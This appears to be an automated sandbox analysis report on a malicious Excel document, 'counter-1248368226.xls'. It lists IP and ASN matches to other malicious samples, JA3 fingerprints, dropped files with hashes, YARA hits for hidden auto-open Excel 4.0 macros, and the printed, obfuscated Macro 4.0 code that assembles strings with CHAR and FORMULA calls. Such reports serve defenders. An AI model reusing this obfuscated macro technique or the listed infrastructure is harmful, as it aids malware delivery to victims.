                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            OIS1UScounter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            a2SyRyTizn.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.203.110
                                                                                                                                                            TSmtIL1EeJ.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.203.110
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            PURCHASE ORDER HECTRO.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.85.81
                                                                                                                                                            chase.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.167
                                                                                                                                                            chase.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.167
                                                                                                                                                            private-1915056036.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.167
                                                                                                                                                            private-1915056036.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.167
                                                                                                                                                            private-1910485378.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.167
                                                                                                                                                            private-1910485378.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.167
                                                                                                                                                            Amended Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.151
                                                                                                                                                            aLTbT3KJXg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.147.203
                                                                                                                                                            NHANHOA-AS-VNNhanHoaSoftwarecompanyVNcounter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-119221000.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            tr.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            counter-1389180325.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            DHLAWB-20210411893335SHPINV.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.101.161.13
                                                                                                                                                            po.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.108
                                                                                                                                                            G1WdS7YlNd.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.10
                                                                                                                                                            vXVSbqN7B6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.10
                                                                                                                                                            6ComlsB8Gq.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.10
                                                                                                                                                            lrOc7QEBcV.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.10
                                                                                                                                                            t21O0lgK1t.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.10
                                                                                                                                                            GUg2wGYjhG.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.10
                                                                                                                                                            p2SijKiqgZ.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.212
                                                                                                                                                            60rUtFJPFb.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.28.36.126
                                                                                                                                                            0987YHJBVTYU-PO.exeGet hashmaliciousBrowse
                                                                                                                                                            • 103.124.93.155
                                                                                                                                                            UNIFIEDLAYER-AS-1UScounter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            CU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.240.9.126
                                                                                                                                                            CU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.240.9.126
                                                                                                                                                            DkX9HVJTmi.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.135.122
                                                                                                                                                            Shipping report -17420.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.169.32
                                                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.240.9.126
                                                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.240.9.126
                                                                                                                                                            INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.214.80.6
                                                                                                                                                            img20048901738_Pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.115.3
                                                                                                                                                            PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.126.156
                                                                                                                                                            PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.126.156
                                                                                                                                                            New order documents. pdf..............exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.179.232.76
                                                                                                                                                            part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.62.201
                                                                                                                                                            img20048901740_Pago.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.115.3
                                                                                                                                                            part-1500645108.xlsbGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.62.201
                                                                                                                                                            shedy.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.218.172
                                                                                                                                                            product list.xlsxGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.218.178
                                                                                                                                                            accounts...exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.164.148

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19counter-1248368226.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            ukmxWblFcs.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            Narudzba.0953635637.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            Orden de compra.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            EmployeeAssessment.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            bUSzS84fr4.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            CU-6431 report.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            Rifc8lYWh7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            umA9dNEzIh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            Rifc8lYWh7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            umA9dNEzIh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            rU6eiJaifC.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            Kqn63gUZFq.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            837375615376.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            NTS_eTaxInvoice 1-12-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            837375615376.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            lzJWJgZhPc.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171
                                                                                                                                                            #U0420R#U04223445FM.htmGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.2.78
                                                                                                                                                            • 108.179.192.98
                                                                                                                                                            • 103.28.36.171

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3638B7F6-A3D7-43B8-AAEC-D8550EE39223
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):140193
                                                                                                                                                            Entropy (8bit):5.357954847830525
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:+cQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:+uQ9DQW+zYXfH
                                                                                                                                                            MD5:6C13F0CA1C4C4F96838C348AFAB72B50
                                                                                                                                                            SHA1:96942CCCEDA33AE9DADCC6424DBA0AED72E5F2A1
                                                                                                                                                            SHA-256:61DB7F05B1E8F36617B5C01873A86ADB1C439432869C6033891FF6C69226CC67
                                                                                                                                                            SHA-512:C2F434D5C1034B5DA53CA00F34CDF77943FFCE76E68DAC61F1C17043A48853C0303D69D1E7E49F804A5D5A127C817E745F9D694720092229F10A2FE59F6F100F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T13:43:53">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CC657B23.tmp
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1536
                                                                                                                                                            Entropy (8bit):1.1464700112623651
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                            MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                            SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                            SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                            SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF1FFD1382AF47CF05.TMP
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28672
                                                                                                                                                            Entropy (8bit):2.974047404887019
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:nkxKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgALlNp:noKpb8rGYrMPe3q7Q0XV5xtezEsi8/dh
                                                                                                                                                            MD5:6235D05472679068C67F48FDCF00B91D
                                                                                                                                                            SHA1:8259DEBBFCAFDA24C2FEF013F0AF4F840B35B847
                                                                                                                                                            SHA-256:9E32E87680CDB684D3D2BB47426999E90B6914D554B84ECBEE63A527D778E059
                                                                                                                                                            SHA-512:50820596D0D1F9404EE4F8732EE1E9A1B7AB26BA1F344DF0F72974859C1056A0157D1F867782270DA8269DF6D6C874E23EC02EF8DB3C0DBC0613E840710BB632
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF8DAE98E0C529E805.TMP
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):512
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3::
                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\Desktop\counter-1248368226.xls
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132608
                                                                                                                                                            Entropy (8bit):6.2763452360498535
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:xKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQJ:xKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgzG
                                                                                                                                                            MD5:045001B5E9C8CC03D4893E9231D17AA6
                                                                                                                                                            SHA1:61C136453CE43CE2555EA0BC9840E6130AABD1BD
                                                                                                                                                            SHA-256:894978747FCC6AEA92D61D3783ECC79AA2E1F02F0E159934AAB2C919BDC99BF6
                                                                                                                                                            SHA-512:8D1021F888291504F9532DDA1825EAED7DBDD546E53A76A79ED5C4B2C87A79F1D5BFE4B51E5C716719085EE9BA5FE621A4CA5AE166EDD14D7D47C79536F5FD8C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                                            • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....pratesh.=. B.....a.........=...........................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
                                                                                                                                                            Entropy (8bit):6.275934021202815
                                                                                                                                                            TrID:
                                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                            File name:counter-1248368226.xls
                                                                                                                                                            File size:132608
                                                                                                                                                            MD5:30a0db47a66a3d3173457755bb166529
                                                                                                                                                            SHA1:c852a219defe8ab726b72f8792386e35428b46dc
                                                                                                                                                            SHA256:bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
                                                                                                                                                            SHA512:ca0fb9713e25d2c3f1fa312c9318801ee7f97d4f0873501bd05de98bc0dc25020d7ae5f7fd88368dcbdc261c4a4d86a9ccc4c376ae85a014945b4cc7f572cb5d
                                                                                                                                                            SSDEEP:3072:LKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQj:LKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgzE
                                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "counter-1248368226.xls"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:True
                                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                                            Encrypted Document:False
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                            Summary

                                                                                                                                                            Code Page:1251
                                                                                                                                                            Author:
                                                                                                                                                            Last Saved By:
                                                                                                                                                            Create Time:2015-06-05 18:19:34
                                                                                                                                                            Last Saved Time:2021-11-30 06:43:37
                                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                                            Security:0

                                                                                                                                                            Document Summary

                                                                                                                                                            Document Code Page:1251
                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                            Company:
                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                            Shared Document:False
                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                            Application Version:1048576

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:4096
                                                                                                                                                            Entropy:0.436875318248
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 8 . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S b r b u k 1 . . . . . S b o r 2 . . . . . S b 1 2 1 1 o r 1 . . . . . S h e e t . . . . . B o r 1 . . . . . B
                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 38 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f8 00 00 00
                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:4096
                                                                                                                                                            Entropy:0.279171118094
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . 2 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 121786
                                                                                                                                                            General
                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Stream Size:121786
                                                                                                                                                            Entropy:6.60410896716
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                            2,6,=
9,2,=CHAR(Sbrbuk1!G26)

                                                                                                                                                            1,5,=CHAR(Sbrbuk1!R27)
12,1,e

                                                                                                                                                            15,6,=FORMULA(Bor1!C8,Bor2!B12)=FORMULA(Bor2!H4,Bor3!G3)=FORMULA(Bor3!C10,Bor4!A2)=FORMULA(Bor4!F9,Bor5!C12)=FORMULA(Bor5!J5,Bor6!B13)=FORMULA(Bor6!F2,Bor1!I3)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!B7&Bor2!B12&Sb1211or1!E1&Bor2!B12&Sb1211or1!C13&Bor2!B12&Sb1211or1!A2&Bor2!B12&Sb1211or1!D4&Bor1!I3&Sb1211or1!A11&Bor1!I3&Sb1211or1!F7,G35)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!B10&Bor1!I3&Sbor2!E2,G37)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!J5&Bor1!I3&Sbor2!S5,G39)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!G8&Bor1!I3&Sbor2!P3,G41)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!O10,G43)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!D14,G45)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!L12,G47)=FORMULA(Bor3!G3&Sbrbuk1!M38&Sbrbuk1!M40&Sbrbuk1!M42&Sbrbuk1!M44&Sbrbuk1!M38&Sbrbuk1!L46,G49)

                                                                                                                                                            3,7,=CHAR(Sbrbuk1!E31)
11,1,r

                                                                                                                                                            2,8,C
7,2,=CHAR(Sbrbuk1!S32)

                                                                                                                                                            1,0,A
